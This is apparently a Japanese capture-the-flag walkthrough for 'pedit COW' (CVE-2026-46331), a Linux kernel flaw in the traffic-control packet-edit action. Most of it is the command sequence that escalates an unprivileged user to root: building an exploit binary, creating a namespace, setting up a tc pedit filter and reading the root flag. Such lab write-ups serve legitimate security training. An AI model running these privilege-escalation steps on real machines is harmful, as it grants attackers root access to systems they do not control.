
pedit COW 脆弱性(CVE-2026-46331)の解説と悪用手順。
このチャレンジでは、traffic-control サブシステムのパケット編集アクション(act_pedit)における Linux カーネルの欠陥である pedit COW を実演します。この脆弱性により、非特権ユーザーが setuid-root バイナリのメモリ内コピーを上書きし、ディスク上のファイルに一切触れることなく実質的に root シェルを取得できます。
環境は非特権ユーザー(karen)として開始されます。
id
cd ~/packet_edit_meme
make packet_edit_meme
unshare -r -n
tc qdisc del dev lo clsact
tc qdisc add dev lo clsact
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64
exit
./packet_edit_meme
# cat /root/flag.txt
THM{YOUR_FLAG_HERE}